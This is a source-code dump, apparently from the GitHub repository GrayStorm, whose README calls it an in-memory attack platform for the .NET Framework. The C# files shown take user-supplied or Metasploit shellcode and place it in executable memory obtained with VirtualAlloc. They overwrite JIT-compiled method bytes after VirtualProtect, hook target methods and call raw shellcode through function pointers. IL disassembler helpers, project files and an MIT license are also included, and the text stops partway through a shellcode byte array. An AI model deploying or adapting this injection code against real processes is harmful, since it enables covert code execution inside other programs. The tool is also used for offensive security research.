38 | object shellcode = payloads_LB.SelectedItem;
39 | displayPayload(shellcode);
40 | metaSploit_LB.SelectedIndex = -1;
41 | }
42 |
43 | private void metaSploit_LB_SelectedIndexChanged(object sender, EventArgs e)
44 | {
45 | if (metaSploit_LB.SelectedIndex == -1)
46 | return;
47 | object shellcode = metaSploit_LB.SelectedItem;
48 | displayPayload(shellcode);
49 | payloads_LB.SelectedIndex = -1;
50 | }
51 |
52 | private void displayPayload(object shellcode)
53 | {
54 | shellcode_RTB.Clear();
55 | payload = shellcode as GrayStorm.dataBox;
56 | if (shellcode is GrayStorm.dataBox)
57 | {
58 | if (disassemble_CB.Checked)
59 | {
60 | beaEngine.disassemble disasm = new beaEngine.disassemble();
61 | unsafe
62 | {
63 | //Prevent garbage collector from relocating a movable variable for the duration of the disassembly and get the IntPtr of a byte array.
64 | fixed (byte* pointer = payload.data)
65 | {
66 | IntPtr offset = (IntPtr)pointer;
67 | disasm.disassembler(payload.data, this.shellcode_RTB, offset);
68 | }
69 | }
70 | }
71 | else
72 | {
73 | foreach (byte opcode in payload.data)
74 | {
75 | shellcode_RTB.AppendText(String.Format("0x{0:X2}\n", opcode));
76 |
77 | }
78 | }
79 | }
80 | }
81 | #endregion listBox selecting
82 |
83 | #region inject shellcode
84 | private void fireShellcode_BT_Click(object sender, EventArgs e)
85 | {
86 | if (metaSploit_LB.SelectedIndex != -1 || payloads_LB.SelectedIndex != -1)
87 | {
88 | GrayStorm.assemblyHelpers.holder = payload.data;
89 | }
90 | else
91 | return;
92 |
93 | int containedIndex = methodHelpers.containedInList(GrayStorm.domainTraverser.currentMethod);
94 | if (containedIndex == -1)
95 | return;
96 |
97 | methodHelpers.StorageInformationArrayList[containedIndex].dumped = false;
98 |
99 | if (hookMethod_CB.Checked && IntPtr.Size == 4)
100 | hookTargetMethod(containedIndex);
101 | else if (hookMethod_CB.Checked && IntPtr.Size == 8)
102 | hookTargetMethod64(containedIndex);
103 | else
104 | {
105 | try
106 | {
107 | DialogResult dialogResult = DialogResult.Yes;
108 | if (payload.data.Length >= methodHelpers.StorageInformationArrayList[containedIndex].oldMethod.Length)
109 | {
110 | dialogResult = MessageBox.Show("Length of shellcode is longer than the origional memory... Continue?", "Warning", MessageBoxButtons.YesNo);
111 | }
112 | if (dialogResult == DialogResult.Yes)
113 | {
114 | methodHijacking.writeAMethod(methodHelpers.StorageInformationArrayList[containedIndex].methodIntPtr);
115 | }
116 | }
117 | catch (Exception ex) { System.Windows.Forms.MessageBox.Show(ex.ToString()); }
118 | }
119 | }
120 |
121 | private void hookTargetMethod(int containedIndex)
122 | {
123 | int indexToStartCleaning = payload.indexToStartCleaning;
124 |
125 | //payload cannot be used with this attack chain if there is no proper index to store reset assembly.
126 | if (indexToStartCleaning == 0)
127 | {
128 | System.Windows.Forms.MessageBox.Show("Payload doesn't support hooking");
129 | return;
130 | }
131 | MethodInfo safeCall = typeof(shellcode).GetMethod("returnOldMethod", BindingFlags.Public | BindingFlags.Static);
132 | IntPtr safeCallPtr = (IntPtr)safeCall.MethodHandle.GetFunctionPointer().ToInt64();
133 |
134 | CToAsmAttackChain.payloadCleaner(containedIndex, safeCallPtr, indexToStartCleaning);
135 | IntPtr payloadAddress = assemblyHelpers.VirtualAlloc(GrayStorm.assemblyHelpers.holder);
136 | System.Runtime.InteropServices.Marshal.Copy(GrayStorm.assemblyHelpers.holder, 0, payloadAddress, GrayStorm.assemblyHelpers.holder.Length);
137 |
138 | byte[] newMemory = CToAsmAttackChain.newPrelude(payloadAddress);
139 | GrayStorm.assemblyHelpers.holder = newMemory;
140 | methodHijacking.writeAMethod(methodHelpers.StorageInformationArrayList[containedIndex].methodIntPtr);
141 | }
142 |
143 | //method called in the hook phase of the CToAsmAttack cycle.
144 | public static void returnOldMethod(int somePtr, int selectedIndex)
145 | {
146 | GrayStorm.assemblyHelpers.holder = methodHelpers.StorageInformationArrayList[selectedIndex].oldMethod;
147 | methodHijacking.writeAMethod(methodHelpers.StorageInformationArrayList[selectedIndex].methodIntPtr);
148 | try
149 | {
150 |
151 | methodHelpers.StorageInformationArrayList[selectedIndex].methodDelegate.DynamicInvoke(null, new object[] { });
152 | }
153 | catch { }
154 | }
155 |
156 | //TODO
157 | private void hookTargetMethod64(int containedIndex)
158 | {
159 | //int indexToStartCleaning = payload.indexToStartCleaning;
160 | ////payload cannot be used with this attack chain if there is no proper index to store reset assembly.
161 | //if (indexToStartCleaning == 0)
162 | //{
163 | // System.Windows.Forms.MessageBox.Show("Payload doesn't support hooking");
164 | // return;
165 | //}
166 |
167 | //MethodInfo safeCall = typeof(shellcodeGUI).GetMethod("returnOldMethod", BindingFlags.NonPublic | BindingFlags.Instance);
168 | //IntPtr safeCallPtr = (IntPtr)safeCall.MethodHandle.GetFunctionPointer().ToInt64();
169 |
170 | //CToAsmAttackChain.payloadCleaner64(containedIndex, safeCallPtr, indexToStartCleaning);
171 | //IntPtr payloadAddress = assemblyHelpers.VirtualAlloc(memoryHijacker.assemblyHelpers.holder);
172 | //System.Runtime.InteropServices.Marshal.Copy(memoryHijacker.assemblyHelpers.holder, 0, payloadAddress, memoryHijacker.assemblyHelpers.holder.Length);
173 |
174 | //byte[] newMemory = CToAsmAttackChain.newPrelude64(payloadAddress);
175 | //GrayStorm.assemblyHelpers.holder = newMemory;
176 | //methodHijacking.writeAMethod(methodHelpers.StorageInformationArrayList[containedIndex].methodIntPtr);
177 | }
178 |
179 |
180 |
181 | #endregion inject shellcode
182 |
183 | #region restore code
184 | private void restoreCode_BT_Click(object sender, EventArgs e)
185 | {
186 | int containedIndex = GrayStorm.methodHelpers.containedInList(domainTraverser.currentMethod);
187 | if (containedIndex == -1)
188 | return;
189 | try
190 | {
191 | GrayStorm.assemblyHelpers.holder = methodHelpers.StorageInformationArrayList[containedIndex].oldMethod;
192 | methodHijacking.writeAMethod(methodHelpers.StorageInformationArrayList[containedIndex].methodIntPtr);
193 | methodHelpers.StorageInformationArrayList[containedIndex].dumped = false;
194 |
195 | }
196 | catch { }
197 | }
198 | #endregion restore code
199 |
200 | #region newShellcode
201 | private void createShellcode_BT_Click(object sender, EventArgs e)
202 | {
203 | byte[] shellcode;
204 | string insertedShellcode = createShellcode_RTB.Text;
205 | bool metaSploit = false;
206 | int offset = 0;
207 | shellcode_RTB.Clear();
208 | insertedShellcode = insertedShellcode.Replace("\\x", string.Empty);
209 | insertedShellcode = insertedShellcode.Replace("0x", string.Empty);
210 | insertedShellcode = insertedShellcode.Replace(", ", string.Empty);
211 | insertedShellcode = insertedShellcode.Replace("\n", string.Empty);
212 | insertedShellcode = System.Text.RegularExpressions.Regex.Replace(insertedShellcode, @"\W+", "");
213 | shellcode = new byte[insertedShellcode.Length];
214 |
215 | try
216 | {
217 | for (int i = 0; i < insertedShellcode.Length; i += 2)
218 | shellcode[i / 2] = Convert.ToByte(insertedShellcode.Substring(i, 2), 16);
219 | if (payloads_LB.SelectedIndex == -1 && metaSploit_LB.SelectedIndex == -1)
220 | return;
221 | else if (payloads_LB.SelectedIndex == -1)
222 | metaSploit = true;
223 | else
224 | metaSploit = false;
225 |
226 | //remove those tailing 0's
227 | int lastIndex = Array.FindLastIndex(shellcode, b => b != 0);
228 | Array.Resize(ref shellcode, lastIndex + 1);
229 | }
230 | catch
231 | {
232 | shellcode_RTB.AppendText("Invalid shellcode detected. Only use shellcode in the form of \n\"\\x##\" \n\"0x##\" \n##\n Shellcode must have 0x##, assembler does not support 0x# operands");
233 | return;
234 | }
235 |
236 | try
237 | {
238 | offset = Convert.ToInt32(hookOffset_TB.Text);
239 | }
240 | catch
241 | {
242 | shellcode_RTB.AppendText("Payload hook offset not in the correct format.\n Please make it a value. -1 means there is none");
243 | return;
244 | }
245 |
246 | dataBox newPayload = new dataBox(payloadName_TB.Text, shellcode, offset);
247 |
248 | if (metaSploit)
249 | {
250 | metaSploit_LB.Items.Add(newPayload);
251 | }
252 | else
253 | payloads_LB.Items.Add(newPayload);
254 | }
255 | #endregion newShellcode
256 | }
257 | }
258 |
--------------------------------------------------------------------------------
/GUI/shellcode.resx:
--------------------------------------------------------------------------------
1 |
2 |
3 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
109 | text/microsoft-resx
110 |
111 |
112 | 2.0
113 |
114 |
115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
116 |
117 |
118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
119 |
120 |
121 | True
122 |
123 |
--------------------------------------------------------------------------------
/GrayStorm.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {56F35D53-1BD9-4B60-9A90-D65B3F897BCF}
8 | WinExe
9 | Properties
10 | GrayStorm
11 | GrayStorm
12 | v3.5
13 | 512
14 |
15 |
16 | x86
17 | true
18 | full
19 | false
20 | bin\Debug\
21 | DEBUG;TRACE
22 | prompt
23 | 4
24 | true
25 |
26 |
27 | AnyCPU
28 | pdbonly
29 | false
30 | bin\Release\
31 | TRACE
32 | prompt
33 | 4
34 | true
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 | UserControl
60 |
61 |
62 | cSharpMethodWriter.cs
63 |
64 |
65 | UserControl
66 |
67 |
68 | memoryHijacker.cs
69 |
70 |
71 | UserControl
72 |
73 |
74 | MethodEditor.cs
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 | Form
85 |
86 |
87 | GrayStorm.cs
88 |
89 |
90 | UserControl
91 |
92 |
93 | hierarchyViewer.cs
94 |
95 |
96 | UserControl
97 |
98 |
99 | shellcode.cs
100 |
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
109 |
110 |
111 |
112 |
113 | cSharpMethodWriter.cs
114 |
115 |
116 | GrayStorm.cs
117 |
118 |
119 | hierarchyViewer.cs
120 |
121 |
122 | memoryHijacker.cs
123 |
124 |
125 | MethodEditor.cs
126 |
127 |
128 | shellcode.cs
129 |
130 |
131 |
132 |
133 |
134 |
135 |
142 |
--------------------------------------------------------------------------------
/GrayStorm.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 2013
4 | VisualStudioVersion = 12.0.21005.1
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "GrayStorm", "GrayStorm.csproj", "{56F35D53-1BD9-4B60-9A90-D65B3F897BCF}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Debug|Mixed Platforms = Debug|Mixed Platforms
12 | Debug|Win32 = Debug|Win32
13 | Debug|x64 = Debug|x64
14 | Release|Any CPU = Release|Any CPU
15 | Release|Mixed Platforms = Release|Mixed Platforms
16 | Release|Win32 = Release|Win32
17 | Release|x64 = Release|x64
18 | EndGlobalSection
19 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
20 | {56F35D53-1BD9-4B60-9A90-D65B3F897BCF}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
21 | {56F35D53-1BD9-4B60-9A90-D65B3F897BCF}.Debug|Any CPU.Build.0 = Debug|Any CPU
22 | {56F35D53-1BD9-4B60-9A90-D65B3F897BCF}.Debug|Mixed Platforms.ActiveCfg = Debug|Any CPU
23 | {56F35D53-1BD9-4B60-9A90-D65B3F897BCF}.Debug|Mixed Platforms.Build.0 = Debug|Any CPU
24 | {56F35D53-1BD9-4B60-9A90-D65B3F897BCF}.Debug|Win32.ActiveCfg = Debug|Any CPU
25 | {56F35D53-1BD9-4B60-9A90-D65B3F897BCF}.Debug|x64.ActiveCfg = Debug|Any CPU
26 | {56F35D53-1BD9-4B60-9A90-D65B3F897BCF}.Release|Any CPU.ActiveCfg = Release|Any CPU
27 | {56F35D53-1BD9-4B60-9A90-D65B3F897BCF}.Release|Any CPU.Build.0 = Release|Any CPU
28 | {56F35D53-1BD9-4B60-9A90-D65B3F897BCF}.Release|Mixed Platforms.ActiveCfg = Release|Any CPU
29 | {56F35D53-1BD9-4B60-9A90-D65B3F897BCF}.Release|Mixed Platforms.Build.0 = Release|Any CPU
30 | {56F35D53-1BD9-4B60-9A90-D65B3F897BCF}.Release|Win32.ActiveCfg = Release|Any CPU
31 | {56F35D53-1BD9-4B60-9A90-D65B3F897BCF}.Release|x64.ActiveCfg = Release|Any CPU
32 | EndGlobalSection
33 | GlobalSection(SolutionProperties) = preSolution
34 | HideSolutionNode = FALSE
35 | EndGlobalSection
36 | EndGlobal
37 |
--------------------------------------------------------------------------------
/IL Disasm/ByteArrayExtensions.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 |
6 |
7 | namespace GrayStorm
8 | {
9 | public static class ByteArrayExtensions
10 | {
11 | public static int GetInt32(this byte[] bytes, int index)
12 | {
13 | return
14 | bytes[index + 0] |
15 | bytes[index + 1] << 8 |
16 | bytes[index + 2] << 16 |
17 | bytes[index + 3] << 24;
18 | }
19 | }
20 | }
21 |
--------------------------------------------------------------------------------
/IL Disasm/ILCode.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Reflection;
4 | using System.Reflection.Emit;
5 |
6 |
7 | namespace GrayStorm
8 | {
9 | public static class ILInstructionLoader
10 | {
11 | public static IEnumerable GetInstructions(MethodBase methodBase)
12 | {
13 | MethodBody methodBody = methodBase.GetMethodBody();
14 |
15 | byte[] bytes;
16 | if (methodBody != null)
17 | {
18 | bytes = methodBody.GetILAsByteArray();
19 | }
20 | else
21 | {
22 | bytes = new byte[] { };
23 | }
24 |
25 |
26 | int offset = 0;
27 |
28 | while (offset < bytes.Length)
29 | {
30 | ILInstruction instruction = new ILInstruction();
31 | instruction.Offset = offset;
32 |
33 | short code = (short)bytes[offset++];
34 | if (code == 0xfe)
35 | {
36 | code = (short)(bytes[offset++] | 0xfe00);
37 | }
38 |
39 | instruction.OpCode = ILOpCodeTranslator.GetOpCode(code);
40 |
41 | switch (instruction.OpCode.OperandType)
42 | {
43 | case OperandType.InlineBrTarget:
44 | offset += 4;
45 | break;
46 |
47 | case OperandType.InlineField:
48 | offset += 4;
49 | break;
50 |
51 | case OperandType.InlineI:
52 | offset += 4;
53 | break;
54 |
55 | case OperandType.InlineI8:
56 | offset += 8;
57 | break;
58 |
59 | case OperandType.InlineMethod:
60 | int metaDataToken = bytes.GetInt32(offset);
61 |
62 | Type[] genericMethodArguments = null;
63 | if (methodBase.IsGenericMethod == true)
64 | {
65 | genericMethodArguments = methodBase.GetGenericArguments();
66 | }
67 |
68 | instruction.Data = methodBase.Module.ResolveMethod(metaDataToken, methodBase.DeclaringType.GetGenericArguments(), genericMethodArguments);
69 | offset += 4;
70 | break;
71 |
72 | case OperandType.InlineNone:
73 | break;
74 |
75 | case OperandType.InlineR:
76 | offset += 8;
77 | break;
78 |
79 | case OperandType.InlineSig:
80 | offset += 4;
81 | break;
82 |
83 | case OperandType.InlineString:
84 | offset += 4;
85 | break;
86 |
87 | case OperandType.InlineSwitch:
88 | int count = bytes.GetInt32(offset) + 1;
89 | offset += 4 * count;
90 | break;
91 |
92 | case OperandType.InlineTok:
93 | offset += 4;
94 | break;
95 |
96 | case OperandType.InlineType:
97 | offset += 4;
98 | break;
99 |
100 | case OperandType.InlineVar:
101 | offset += 2;
102 | break;
103 |
104 | case OperandType.ShortInlineBrTarget:
105 | offset += 1;
106 | break;
107 |
108 | case OperandType.ShortInlineI:
109 | offset += 1;
110 | break;
111 |
112 | case OperandType.ShortInlineR:
113 | offset += 4;
114 | break;
115 |
116 | case OperandType.ShortInlineVar:
117 | offset += 1;
118 | break;
119 |
120 | default:
121 | throw new NotImplementedException();
122 | }
123 |
124 | yield return instruction;
125 | }
126 | }
127 | }
128 | }
129 |
--------------------------------------------------------------------------------
/IL Disasm/ILInstruction.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Reflection;
3 | using System.Reflection.Emit;
4 |
5 | namespace GrayStorm
6 | {
7 | public sealed class ILInstruction
8 | {
9 | public int Offset
10 | {
11 | get;
12 | set;
13 | }
14 |
15 |
16 | public OpCode OpCode
17 | {
18 | get;
19 | set;
20 | }
21 |
22 |
23 | public object Data
24 | {
25 | get;
26 | set;
27 | }
28 |
29 | }
30 |
31 | }
32 |
--------------------------------------------------------------------------------
/IL Disasm/ILOpCodeTranslator.cs:
--------------------------------------------------------------------------------
1 | using System.Collections.Generic;
2 | using System.Reflection;
3 | using System.Reflection.Emit;
4 |
5 | namespace GrayStorm
6 | {
7 | internal static class ILOpCodeTranslator
8 | {
9 | private static Dictionary _opCodes = new Dictionary();
10 |
11 | static ILOpCodeTranslator()
12 | {
13 | Initialize();
14 | }
15 |
16 |
17 | public static OpCode GetOpCode(short value)
18 | {
19 | return _opCodes[value];
20 | }
21 |
22 |
23 | private static void Initialize()
24 | {
25 | foreach (FieldInfo fieldInfo in typeof(OpCodes).GetFields())
26 | {
27 | OpCode opCode = (OpCode)fieldInfo.GetValue(null);
28 |
29 | _opCodes.Add(opCode.Value, opCode);
30 | }
31 | }
32 | }
33 | }
34 |
--------------------------------------------------------------------------------
/IL Disasm/formatOutput.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 |
6 | using System.Reflection;
7 |
8 | namespace GrayStorm
9 | {
10 | class formatOutput
11 | {
12 | public string setUpDataFormat(ILInstruction instruction)
13 | {
14 | MethodInfo methodInfo = instruction.Data as MethodInfo;
15 | if (methodInfo != null)
16 | {
17 | return FormatDataMethod(instruction, methodInfo);
18 | }
19 |
20 | ConstructorInfo constructorInfo = instruction.Data as ConstructorInfo;
21 | if (constructorInfo != null)
22 | {
23 | return FormatDataConstructor(constructorInfo);
24 | }
25 |
26 | return null;
27 | }
28 |
29 | private string FormatDataMethod(ILInstruction instruciton, MethodInfo selectedMethod)
30 | {
31 | if (instruciton.Data == null) return "";
32 | bool isFirst = true;
33 | StringBuilder sb = new StringBuilder();
34 |
35 | sb.Append(WhatTypeIsIt(selectedMethod.ReturnType));
36 | sb.Append(" ");
37 | sb.Append(WhatTypeIsIt(selectedMethod.DeclaringType));
38 | sb.Append(".");
39 | sb.Append(selectedMethod.Name);
40 | sb.Append("(");
41 | isFirst = true;
42 | foreach (ParameterInfo parameterInfo in selectedMethod.GetParameters())
43 | {
44 | if (isFirst == true) isFirst = false;
45 | else sb.Append(", ");
46 |
47 | sb.Append(WhatTypeIsIt(parameterInfo.ParameterType));
48 | }
49 | sb.Append(")");
50 |
51 | return sb.ToString();
52 | }
53 |
54 | private string FormatDataConstructor(ConstructorInfo constructorInfo)
55 | {
56 | StringBuilder sb = new StringBuilder();
57 | sb.Append(WhatTypeIsIt(constructorInfo.DeclaringType));
58 | sb.Append(constructorInfo.Name);
59 | sb.Append("(");
60 | bool isFirst = true;
61 | foreach (ParameterInfo parameterInfo in constructorInfo.GetParameters())
62 | {
63 | if (isFirst == true) isFirst = false;
64 | else sb.Append(", ");
65 |
66 | sb.Append(WhatTypeIsIt(parameterInfo.ParameterType));
67 | sb.Append(" ");
68 | sb.Append(parameterInfo.Name);
69 | }
70 | sb.Append(")");
71 |
72 | return sb.ToString();
73 | }
74 |
75 | private string WhatTypeIsIt(Type type)
76 | {
77 | bool isFirst = true;
78 | if (type.IsGenericType == false)
79 | {
80 |
81 | return type.FullName;
82 | }
83 | else
84 | {
85 | Type genericType = type.GetGenericTypeDefinition();
86 |
87 | StringBuilder sb = new StringBuilder();
88 |
89 | sb.Append(genericType.FullName);
90 | sb.Append("[");
91 | foreach (Type parameterType in type.GetGenericArguments())
92 | {
93 | if (isFirst == true) isFirst = false;
94 | else sb.Append(", ");
95 |
96 | sb.Append(WhatTypeIsIt(parameterType as Type));
97 | }
98 | sb.Append("]");
99 |
100 | return sb.ToString();
101 | }
102 | }
103 | }
104 | }
105 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | The MIT License (MIT)
2 |
3 | Copyright (c) 2015 Topher Timzen
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
--------------------------------------------------------------------------------
/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Threading;
5 | using System.Windows.Forms;
6 |
7 | namespace GrayStorm
8 | {
9 | static class Program
10 | {
11 | ///
12 | /// The main entry point for the application.
13 | ///
14 | [STAThread]
15 | public static void Main()
16 | {
17 | //Still using tricks to ensure two GUI threads don't cause application hang even though this is also handled in the injector, GrayFrost.
18 | if (!System.AppDomain.CurrentDomain.FriendlyName.Contains("GrayStorm"))
19 | {
20 | string name = System.Reflection.Assembly.GetCallingAssembly().FullName;
21 | System.Threading.ThreadPool.QueueUserWorkItem(new System.Threading.WaitCallback(
22 | delegate
23 | {
24 | System.Threading.Thread t = new System.Threading.Thread(new System.Threading.ThreadStart(
25 | delegate
26 | {
27 | Application.EnableVisualStyles();
28 | Application.SetCompatibleTextRenderingDefault(false);
29 | Application.Run(new grayStorm());
30 | }));
31 | t.Priority = System.Threading.ThreadPriority.Lowest;
32 | t.SetApartmentState(System.Threading.ApartmentState.STA);
33 | t.Start();
34 | t.IsBackground = true;
35 | System.Threading.Thread.Sleep(100);
36 | }), null);
37 | System.Threading.Thread.Sleep(100);
38 | }
39 | else
40 | {
41 | Application.EnableVisualStyles();
42 | Application.SetCompatibleTextRenderingDefault(false);
43 | Application.Run(new grayStorm());
44 | }
45 | }
46 | }
47 | }
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # GrayStorm
2 |
3 | GrayStorm is an in memory attack platform that targets the .NET Framework and is injectable by utilizing [GrayFrost](https://github.com/graykernel/GrayFrost "GrayFrost").
4 |
5 | GrayStorm can
6 |
7 | - Attack the .NET JIT
8 | - Attack .NET at the ASM level
9 | - Use ASM and Metasploit payloads
10 | - Utilize objects on the Managed Heap
11 | - Read/Write a Method's ASM
12 | - Use on-the-fly compiled C# to overwrite call addresses and JIT Stubs
13 | - Disassemble a Method's ASM with [BeaEngine](http://www.beaengine.org/).
14 |
15 | For a some how-to tips, visit [http://www.tophertimzen.com/](http://www.tophertimzen.com/).
16 |
17 | GrayStorm is currently under active support. If you have any issues or pull requests, do not hesitate to submit them!
18 |
19 |
--------------------------------------------------------------------------------
/assemblyHelpers/assemblyHelpers.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 |
6 | namespace GrayStorm
7 | {
8 | public class assemblyHelpers
9 | {
10 | #region WINAPI Imports
11 | // just magic numbers
12 | [Flags()]
13 | public enum AllocationType : uint
14 | {
15 | COMMIT = 0x1000,
16 | RESERVE = 0x2000,
17 | RESET = 0x80000,
18 | LARGE_PAGES = 0x20000000,
19 | PHYSICAL = 0x400000,
20 | TOP_DOWN = 0x100000,
21 | WRITE_WATCH = 0x200000
22 | }
23 |
24 | // just magic numbers
25 | [Flags()]
26 | public enum MemoryProtection : uint
27 | {
28 | EXECUTE = 0x10,
29 | EXECUTE_READ = 0x20,
30 | EXECUTE_READWRITE = 0x40,
31 | EXECUTE_WRITECOPY = 0x80,
32 | NOACCESS = 0x01,
33 | READONLY = 0x02,
34 | READWRITE = 0x04,
35 | WRITECOPY = 0x08,
36 | GUARD_Modifierflag = 0x100,
37 | NOCACHE_Modifierflag = 0x200,
38 | WRITECOMBINE_Modifierflag = 0x400
39 | }
40 |
41 | [System.Runtime.InteropServices.DllImport("kernel32.dll", SetLastError = true)]
42 | public static extern bool VirtualProtect(IntPtr lpAddress, uint dwSize, uint flNewProtect, out uint lpflOldProtect);
43 |
44 | // windows call to alloc space in the process
45 | [System.Runtime.InteropServices.DllImport("kernel32.dll", SetLastError = true)]
46 | public static extern IntPtr VirtualAlloc(IntPtr lpAddress, UIntPtr dwSize, AllocationType flAllocationType, MemoryProtection flProtect);
47 |
48 | // windows call to free space in the process
49 | [System.Runtime.InteropServices.DllImport("kernel32")]
50 | public static extern bool VirtualFree(IntPtr lpAddress, UInt32 dwSize, UInt32 dwFreeType);
51 | #endregion WINAPI Imports
52 |
53 | #region virtualAlloc
54 | //Virtual alloc and marshal copy shellcode to an IntPtr.
55 | public static IntPtr VirtualAlloc(byte[] shellcodeIN)
56 | {
57 | IntPtr virtualMemory = VirtualAlloc(IntPtr.Zero, new UIntPtr((uint)shellcodeIN.Length), AllocationType.COMMIT | AllocationType.RESERVE, MemoryProtection.EXECUTE_READWRITE);
58 | System.Runtime.InteropServices.Marshal.Copy(shellcodeIN, 0, virtualMemory, shellcodeIN.Length);
59 | return virtualMemory;
60 | }
61 |
62 | #endregion
63 |
64 | #region readFunction
65 | public delegate void dumpMemoryFunction_ByteArray(IntPtr targetIN, IntPtr memoryIntPtrIN, int sizeOfDataIN);
66 |
67 | public static byte[] DumpAFunction(IntPtr target)
68 | {
69 | byte[] memory = new byte[0];
70 | int tries = 0;
71 | try
72 | {
73 | while (memory.Length < 1 && tries != 4)
74 | {
75 | memory = readFunction(target);
76 | tries++;
77 | }
78 | }
79 | catch
80 | {
81 | }
82 | int lastIndex = Array.FindLastIndex(memory, b => b != 0);
83 | Array.Resize(ref memory, lastIndex + 1);
84 | return memory;
85 | }
86 |
87 | public static byte[] readFunction(IntPtr assForeMan)
88 | {
89 | IntPtr ptrTemp = new IntPtr(assForeMan.ToInt64());
90 | byte[] memory = new byte[500];
91 | int t = 0;
92 | bool c3 = false;
93 | for (int i = 0; i < memory.Length; i++)
94 | {
95 | memory[i] = System.Runtime.InteropServices.Marshal.ReadByte(new IntPtr(ptrTemp.ToInt64() + i));
96 |
97 | if (memory[i] == 0xc3)
98 | {
99 | c3 = true;
100 | }
101 | else if (c3 && memory[i] == 0x00)
102 | {
103 | t++;
104 | if (t == 3)
105 | break;
106 | }
107 | else
108 | {
109 | c3 = false;
110 | t = 0;
111 | }
112 | }
113 | int lastIndex = Array.FindLastIndex(memory, b => b == 0xc3);
114 | Array.Resize(ref memory, lastIndex + 1);
115 | return memory;
116 | }
117 | #endregion
118 |
119 | #region callingMethodWithShellcode
120 | public delegate void launchShellCodeIntPtr(IntPtr target);
121 |
122 | public static void callATrueIntPtr(IntPtr intPtrToFire, byte[] callingMethodIN)
123 | {
124 | IntPtr p = VirtualAlloc(callingMethodIN);
125 | launchShellCodeIntPtr fireShellcode = (launchShellCodeIntPtr)System.Runtime.InteropServices.Marshal.GetDelegateForFunctionPointer(p, typeof(launchShellCodeIntPtr));
126 | try
127 | {
128 | fireShellcode(intPtrToFire);
129 | }
130 | catch (Exception ex)
131 | {
132 | System.Windows.Forms.MessageBox.Show("Failed in callATrueIntPtr because of " + ex.Message);
133 | }
134 | VirtualFree(p, 0, 0x8000);
135 | }
136 |
137 | #endregion
138 |
139 | #region writeShellcode
140 | public delegate void writeMemoryFunction_ByteArray(IntPtr targetIN, IntPtr memoryIntPtrIN);
141 |
142 | public static void writeDynamicShellcode(IntPtr methodToOverWrite)
143 | {
144 | writeFunction(holder, methodToOverWrite);
145 | }
146 |
147 | //dirty deeds!
148 | public static void writeFunction(byte[] ShellCodeInGoodOut, IntPtr ptrTemp)
149 | {
150 | uint old;
151 | VirtualProtect(ptrTemp, (uint)8, 0x40, out old);
152 |
153 | for (int i = 0; i < ShellCodeInGoodOut.Length; i++)
154 | {
155 | System.Runtime.InteropServices.Marshal.WriteByte(new IntPtr(ptrTemp.ToInt64() + i), ShellCodeInGoodOut[i]);
156 | }
157 | }
158 | #endregion
159 |
160 | #region read, calling and writing shellcode
161 |
162 | public static void set64bit()
163 | {
164 | call_a_fun_ptr = call_a_fun_ptr_64;
165 | call_a_fun_ptr_INT3 = call_a_fun_ptr_INT3_64;
166 | }
167 |
168 | static public byte[] holder = new byte[]
169 | {
170 | 0x00
171 | };
172 |
173 | ///
174 | /// Takes an IntPtr as an argument and will call it.
175 | ///
176 | static public byte[] call_a_fun_ptr = new byte[]
177 | {
178 | 0x60, //pushad
179 | 0x55,//push ebp
